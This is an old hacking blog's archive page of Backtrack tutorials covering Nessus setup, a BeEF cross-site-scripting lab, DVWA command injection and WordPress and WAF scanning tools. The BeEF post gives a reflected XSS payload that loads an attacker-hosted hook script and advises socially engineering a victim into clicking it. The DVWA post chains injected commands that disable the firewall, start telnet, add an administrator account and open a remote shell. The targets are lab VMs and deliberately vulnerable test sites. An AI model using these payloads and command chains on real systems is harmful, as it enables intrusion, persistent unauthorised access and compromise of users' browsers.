Hacking

Hacking is an ART OF EXPLOITATION.

Nessus

One of Good Network Vulnerability Scanner.

Accunetix

Web Application Scanner.

BeEF

Do You Love BeEF, Its an Browser Based Exploitation Framework.

Wikileaks

WikiLeaks is an international, online, non-profit[2] organisation which publishes secret information, news leaks, and classified media from anonymous sources.

Showing posts with label backtrack. Show all posts
Showing posts with label backtrack. Show all posts

Monday, October 1, 2012

Installing Nessus on Backtrack 5R3

4:35 AM  , , , ,  3 comments

Hello Friends,

Today i am showing how to install Nessus on Backtrack 5 R3

First go to the Nessus Website and register by clicking here

the Activation code will be send to your e-mail ID, Now take the Activation code

Open an new terminal in Backtrack 5R3  and type the following command to download the Nessus

apt-get install nessus

after complete download next type this command

root@bt:/opt/nessus/bin/nessus-fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

it will take some time so that the plugins will be updated

Now add an user to the Nessus by using this command,

root@bt:/opt/nessus/sbin/nessus-adduser

now it will ask for username and password,after entering the username and password you have to start the nessus by typing the following command.

root@bt:/etc/init.d/nessusd start

it will start the nessus, now open the browser and type the following command in the URL of the browser

https://localhost:8834/

The nessus will run on the secure channel https and on the port number 8834

Bydefault the nessus will run on port number 8834

after installing you just have to run


Thank you.




Read More

Tuesday, September 4, 2012

BeEF Lab

12:09 AM  , , , ,  No comments


Hello friends

we seen how to start and test BeEF in the previous post. Now in this post we will be seeing how to work with XSS Vulnerability by using BeEF Framework.

Lab Setting:


1.XP Virtual Machine (Victim)
2.Backtrack VM (Attacker)

Attacker:


1.Start BeEF in the Backtrack.

Now we will get the UI URL and the HOOK URL



2.Open the browser (any browser but firefox is preferable)

3.Copy the UI URL from the terminal and paste it in a URL of a browser http://192.168.0.103:3000/ui/panel

4.Now you will get the login screen of beef

5.Enter the username and password as beef/beef



6.Take any site that is vulnerable to xss ex: demo.testfire.net

7.Check for the cross site scripting vulnerability with simple script <script>alert(123);</script>



8.paste that script in the search box of demo.testfire.net



9.See if you are getting the pop up box or not



10.see the URL in the website http://demo.testfire.net/search.aspx?txtSearch=<script>alert(123);</script>

11.Frame the URL with like this <script src=http://192.168.0.103:3000/hook.js></script>

http://demo.testfire.net/search.aspx?txtSearch=<script src=http://192.168.0.103:3000/hook.js></script>



12.perform some social engineering to send the link to victim by using the mail or chat

Victim:


1.Now victim open the link the attacker sended nothing changed, the page is as usual

Attacker:


when ever the victim opens that link check in the beef user interface

the beef will create a zombie of victim system

click on the zombie which created



Go to the Commands tab --> Misc --> Raw javascript --> Execute



and see in the victim machine i.e,XP



now u can execute what ever the commands u want on the victim machine.

in the next post i will show how to integrate the metasploit with the beef framework

thank u

Read More

Saturday, May 19, 2012

Command Execution Vulnerability Exploitation

3:55 AM  , , , ,  No comments


Today i will be showing how to hack the website with the command execution vulnerability.

we will be see this on the DVWA

What is Command Execution ?

OS command injection is a technique used via a web interface in order to execute OS commands on a web server.

The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.

*** In the previous article i written how to access the dvwa from the backtrack that is installed in XP machine

Practical:

1.Take XP machine and the Backtrack Machine

2.Enter the ip of the XP machine and the dvwa

http://192.168.25.54/dvwa

the dvwa will open and go to command execution

3.The DVWA website asked to enter the IP to ping

so enter the 127.0.0.1(Your IP)

its pingging so its cool ..

4.Now try to execute the dir command ..

boom.......

got an error whats the problem ..

it only allows you to execute the ping command not any other then

how to bypass this

we can bypass this by using && or |(pipe) symbol

5. Now lets try this command

127.0.0.1 && dir  ( or)

127.0.0.1 | dir   ( or)

 | dir

means just pipe and command


ok its executed, now try to find the ip of remote system

127.0.0.1 | ifconfig

Now if u want to find the files in the system32 directory then

127.0.0.1 && cd ../../../../../windows/system32 & dir


Now you can access what ever files you require from the system

What else we can do with Command Execution

Normally i am executing the command like this

| dir

but after this i want to take shell of the remote computer, we are having different ways i am showing one

1.so what i do is i disabled the firewall by executing the windows commands

To disable the windows XP firewall

    netsh firewall set opmode disable

In your command execution type as "| netsh firewall set opmode disable" (without quotes)
   
To enable the windows XP firewall

    netsh firewall set opmode enable
   
2. After that i want to start the service which is help ful for me, so i started the TELNET service by using the following commands

To start the TELNET service from command prompt

    sc config tlntsvr start= auto (Hit Enter)

    net start telnet

In your command execution type as "| sc config tlntsvr start= auto" (without quotes)

    | net start telnet



3.so i want to access the remote PC with the help of Telnet but it will ask the login and password

so i added 1 user from cmd prompt only

To add new user from command prompt

    net user /add user1 Ab12345

In your command execution type as "| net user /add user1 Ab12345" (without quotes)



4.Now i am the user but not having prievilages to access the telnet so thats why i added this user to the Administrators group for admin prievilages

    net localgroup administrators user1 /add

In your command execution type as "| net localgroup administrators user1 /add" (without quotes)   

5.I started a terminal in the backtrack and try to connect with the telnet

After that now i connected with the telnet

    telnet 192.168.x.x
   
    login:user1
    password:Ab12345





Boooooooooooooooom...............
   
Got the shell of the remote computer

    c:\>



Read More

Access DVWA from Backtrack

1:37 AM  , ,  No comments

Hi,

Today i will show you, How to access the DVWA(Damn Vulnerable Web Application) that is installed on the xp machine from the backtrack

1.First we require the XP machine and Backtrack machine in same network means

if the XP machine ip is 192.168.0.22

then backtrack should also be in the same network like 192.168.0.56

2.Install the XAMPP in the XP macine and start the services like Apache and Mysql




3. Download the DVWA(Damn Vulnerable Web Application) from http://sourceforge.net/projects/dvwa/  and paste in the c:/xampp/htdocs/

4. Now go to the dvwa folder and open the .htaccess file with notepad

5.Move to last and place a hash(#) before the "Deny from all"

and write "Allow from all in the next line"



6.Now go to the backtrack and in the browser type the ip of XP machine

http://192.168.0.22/dvwa

7.now you can access the dvwa easily as from remote



Thank You.


Read More

Thursday, April 26, 2012

Installing Google Chrome in Backtrack 5

6:43 AM  , ,  6 comments








Friends ,

Many asking how to install the Google chrome browser in the backtrack 5, today we will be seeing how to install that



Let us see the steps

1.In the root type as

apt-get install chromium-browser



2.change to chrome-browser directory

 cd /usr/lib/chromium-browser




3.Type the following command

 hexedit chromium-browser




4.You will be getting the hex-code ,


Here you have to search for geteuid and replace with getppid


press TAB and search (CTRL+S) for geteuid and change it to getppid and press CTRL+X ,

it will ask to save or not press 'Y' and close the terminal

and go to the Applications --> Internet --> Chromium Browser

and check whether the browser installed properly or not and enjoy the Backtrack.

Read More

Saturday, October 29, 2011

WPScan - Wordpress Security Scanner

9:59 AM  ,  No comments






 Wordpress Security Scanner

WPScan is a vulnerability scanner which checks the security of WordPress installations using a black box approach.

WPScan is written in Ruby

The features of WPScan are :

  It will enumerate the Usernames
  Weak Password Cracking
  Plugin Vulnerability Enumeration
  Version Enumeration
  Vulnerability Enumeration
  etc ........

It can be free downloaded from http://code.google.com/p/wpscan/

OR

It is available in Backtrack 5  /pentest/web/wpscan/

Syntax:
         ruby ./wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50


Read More

Plecost - Wordpress fingerprint tool

9:02 AM  ,  No comments

Plecost



A Wordpress finger print tool available in open source with Backtrack 5

Plecost retrieves the information contained on the Web site to be analyzed, and also allows a search on the results indexed by Google.

It bases your analysis from information contained in the files of development included by WordPress and them plugins. The plugins list is generated based on the list of "Most populars" from wordpress.org, and linked with related entries in CVE.mitre.org.

plecost is available at http://code.google.com/p/plecost

the plecost will finger print the plugins and give the corresponding CVE entries also

syntax:

     ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt http://www.example.com -G

      



Read More

Friday, October 28, 2011

WafW00f - A Web Application Audit Tool

11:09 AM  ,  No comments


WAFW00F - Web Application Firewall Detection Tool

WafW00f is written in  phython and is available freely on the net,

the tool is developed By Sandro Gauci && Wendel G. Henrique.

they mentions that Web Application Firewalls (WAFs) :
  • can be detected, because they leave several signs
  • can be bypassed by changing the attack in order to avoid rules
To help detect and bypass WAFs, they released wafw00f

WAFW00F allows one to identify and fingerprint WAF products protecting a website

Download Link

http://waffit.googlecode.com/svn/trunk/ waffit-read-only

or you can find it in Backtrack 5 R1 version

You can find it in   /pentest/web/waffit/


example 1: /pentest/web/waffit# ./wafw00f.py http://www.example.com

output:

Checking http://www.example.com
Generic Detection results:
No WAF detected by the generic detection

example 2: /pentest/web/waffit# ./wafw00f.py http://www.example2.com

output:

Checking http://www.example2.com
The site http://www.example2.com is behind a Citrix NetScaler



Read More
Subscribe to: Posts (Atom)